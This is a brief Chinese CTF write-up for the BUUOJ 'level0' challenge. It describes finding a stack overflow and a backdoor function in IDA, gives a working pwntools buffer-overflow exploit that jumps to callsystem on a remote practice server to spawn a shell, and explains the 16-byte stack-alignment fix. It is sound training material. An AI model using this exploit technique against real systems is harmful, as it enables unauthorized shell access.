查看文件信息
关键信息
IDA64反汇编
进入第一个函数
栈溢出
shift + F12
查找字符串
点进去
发现是一个后门函数
from pwn import *
context.arch = 'amd64'
# p = process("/tmp/pwn/level0")
p = remote("node4.buuoj.cn",28644)
elf = ELF("/tmp/pwn/level0")
callsystem = elf.symbols['callsystem']
p.sendline(flat([b"a"*128, 'a'*8, callsystem]))
p.interactive()
修改代码处
p.sendline(flat([b"a"*128, 'a'*8, callsystem + 1]))
为什么地址地址 + 1
就可以执行了呢?
64位ubuntu18以上系统调用system函数时是需要栈对齐的。再具体一点就是64位下system函数有个movaps指令,这个指令要求内存地址必须16字节对齐
跳过了push rbp之后,rsp就少压栈了8字节,此时栈16位对齐